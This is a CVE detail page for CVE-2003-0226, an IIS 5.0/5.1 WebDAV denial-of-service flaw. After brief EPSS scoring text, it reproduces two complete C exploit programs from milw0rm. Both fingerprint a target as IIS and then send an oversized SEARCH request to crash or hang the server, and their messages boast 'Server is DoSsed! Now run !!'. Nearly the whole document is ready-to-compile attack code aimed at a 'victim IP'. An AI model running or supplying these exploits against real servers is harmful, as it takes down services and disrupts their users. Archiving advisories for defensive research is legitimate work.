CVE-2003-0226 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* source: https://www.securityfocus.com/bid/7735/info Microsoft Internet Information Services has been reported vulnerable to a denial of service. When WebDAV receives excessively long requests to the 'PROPFIND' or 'SEARCH' variables, the IIS service will fail. All current web, FTP, and email sessions will be terminated. IIS will automatically restart and normal service will resume. ** It has been reported that if a WebDAV request with a certain number of bytes is received, the Inetinfo service will remain alive but cease serving requests. This will cause the IIS server to stop serving requests until the service is manually restarted. */ /* IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+ Bid: 7735 */ #define ERROR -1 #define OK 1 #ifdef HAVE_CONFIG_H #include <config.h> #endif #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <string.h> int check_for_iis(); void screw_iis(); void usage(); char IP[15]; int main(int argc, char *argv[]) { /* cout << "Hello, World!" << endl; */ if(argc !=2) { usage(); exit(0); } printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n"); strcpy(IP, argv[1]); if(check_for_iis() != OK) { printf("Sorry, BAD LUCK! \n"); exit(0); } screw_iis(); return EXIT_SUCCESS; } int check_for_iis() { int sck, flag = 1; struct sockaddr_in sin; char req[50]; sck = socket(AF_INET, SOCK_STREAM, 0); if(sck == ERROR) { perror("Socket error "); exit(0); } sin.sin_port = htons(80); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(IP); if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1) { perror("Connect Error "); exit(0); } strcpy(req, "GET / HTTP/1.0\r\n\n"); send(sck, req, sizeof(req), 0); recv(sck, req, sizeof(req), 0); if (strstr(req,"IIS") == NULL) { printf(" Not an IIS server! \n"); flag = 0; } sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40); send(sck, req, sizeof(req), 0); recv(sck, req, sizeof(req), 0); if (strstr(req,"HTTP/1.1 411 Length Required") == NULL) { printf("METHOD SEARCH NOT ALLOWED. \n"); flag = 0; } return(flag); } void screw_iis() { int sck, flag = 1; struct sockaddr_in sin; char junk[100]; char buffer[65535] =""; char request[80000]; char content[] = "<?xml version=\"1.0\"?>\r\n" "<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\n" "Select \"DAV:displayname\" from scope()\r\n" "</g:sql>\r\n" "</g:searchrequest>\r\n"; sck = socket(AF_INET, SOCK_STREAM, 0); if(sck == ERROR) { perror("Socket error "); exit(0); } sin.sin_port = htons(80); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(IP); if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1) { perror("Connect Error "); exit(0); } buffer[sizeof(buffer)]=0x00; memset(buffer,'S',sizeof(buffer)); memset(request,0,sizeof(request)); memset(junk,0,sizeof(junk)); sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon tent-Length: ",buffer,IP); sprintf(request,"%s%d\r\n\r\n",request,strlen(content)); printf("\r\nScrewing the server... \n"); send(sck,request,strlen(request),0); send(sck,content,strlen(content),0); recv(sck,junk,sizeof(junk),0); if(junk[0]==0x00) { printf("Server is Screwed! \r\n"); } else { printf("BAD LUCK. Patched.\n"); } } void usage() { printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n"); printf("Usage\r\n"); printf("Screw_IIS <victim IP>\n"); }

/* Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit that makes use of the vulnerability recently published by SPI dynamics Published on 31.05.2003 */ #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment (lib,"ws2_32") void graphitte() {printf("\n********************************** "); printf("\n Webdav MICROSOFT IIS DoS Exploit * \n"); printf("+++++++++++++++++++++++++++++++*\n"); printf(" by Shachank Pandrey *\n"); printf("*************************************\n"); } char *funk(char tobesent[100],char *host) { int s; char got[100]; WSADATA wsaData; struct hostent *yo; struct sockaddr_in heck; char lala[100]; if(WSAStartup(0x0101,&wsaData)!=0) { printf("error starting winsock.."); return 0; } if ((yo = gethostbyname(host))==0){ printf("error: can't resolve '%s'",host); return 0; } heck.sin_port = htons(80); heck.sin_family = AF_INET; heck.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("Error: Unable to create socket"); } if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){ printf("Error: Cudn't Connect\r\n"); } memset(lala,0,sizeof(lala)); sprintf(lala,"%s",tobesent,sizeof(tobesent)); send(s,lala,strlen(lala),0); recv(s,got,100,0); return got; closesocket(s); WSACleanup(); printf("done.\n"); } int main(int argc, char *argv[]) { WSADATA wsaData; int s;char mysend[100]; char *gotme; char trash[100]; struct hostent *yo; struct sockaddr_in heck; char buffer[65535] =""; char myrequest[80000]; char content[] = "<?xml version=\"1.0\"?>\r\n" "<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\n" "Select \"DAV:displayname\" from scope()\r\n" "</g:sql>\r\n" "</g:searchrequest>\r\n"; graphitte(); if(WSAStartup(0x0101,&wsaData)!=0) { printf("Error :Cudn't initiate winsock!"); return 0; } if(argc<2) {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]); exit(0);} if ( (yo = gethostbyname(argv[1]))==0) { printf("error: can't resolve '%s'",argv[1]); return 1; } printf("\nChecking web server %s\n",argv[1]); gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]); if (strstr(gotme,"IIS/5.0") == NULL) { printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]); } else { printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]); sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40); gotme=(char *)funk(mysend,argv[1]); if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL) { printf("\n\r----> METHOD SEARCH ALLOWED\r\n"); } else { printf("\n----> Method SEARCH not Allowed ! adios...\n"); exit(0); } heck.sin_port = htons(80); heck.sin_family = AF_INET; heck.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("error: can't create socket"); return 1; } if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){ printf("Error:Cudn't Connect\r\n"); return 1; } buffer[sizeof(buffer)]=0x00; memset(buffer,'S',sizeof(buffer)); memset(myrequest,0,sizeof(myrequest)); memset(trash,0,sizeof(trash)); sprintf(myrequest,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\ nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]); sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content)); printf("\r\nDoSsing the server...<pray>\n"); send(s,myrequest,strlen(myrequest),0); send(s,content,strlen(content),0); recv(s,trash,sizeof(trash),0); if(trash[0]==0x00) { printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n"); } else printf("Server is prolly patched.\r\n"); closesocket(s); } WSACleanup(); return 1; } // milw0rm.com [2003-05-31]